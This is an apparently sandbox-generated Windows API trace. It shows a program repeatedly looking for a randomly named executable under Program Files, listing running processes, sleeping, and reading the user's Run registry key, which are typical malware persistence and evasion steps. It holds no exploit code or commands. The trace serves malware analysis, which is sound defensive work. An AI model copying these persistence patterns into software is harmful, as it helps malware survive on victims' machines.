[0262.521] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.521] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.521] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.522] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.522] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.617] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.629] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.629] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.630] NtClose (Handle=0x14c) returned 0x0 [0262.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.630] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.630] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.630] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.630] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.726] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.739] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.740] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.740] NtClose (Handle=0x14c) returned 0x0 [0262.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.740] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.740] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.740] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.740] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.845] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.848] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.848] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.848] NtClose (Handle=0x14c) returned 0x0 [0262.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.848] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.848] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.848] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.849] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.849] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.952] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.958] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.958] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.958] NtClose (Handle=0x14c) returned 0x0 [0262.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.958] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.958] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.958] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.958] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.065] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.068] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.068] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.068] NtClose (Handle=0x14c) returned 0x0 [0263.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.068] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.068] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.069] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.069] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.164] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.176] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.176] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.176] NtClose (Handle=0x14c) returned 0x0 [0263.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.176] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.176] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.176] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.176] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.285] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.301] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.301] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.301] NtClose (Handle=0x14c) returned 0x0 [0263.302] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.302] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.302] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.302] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.302] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.302] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 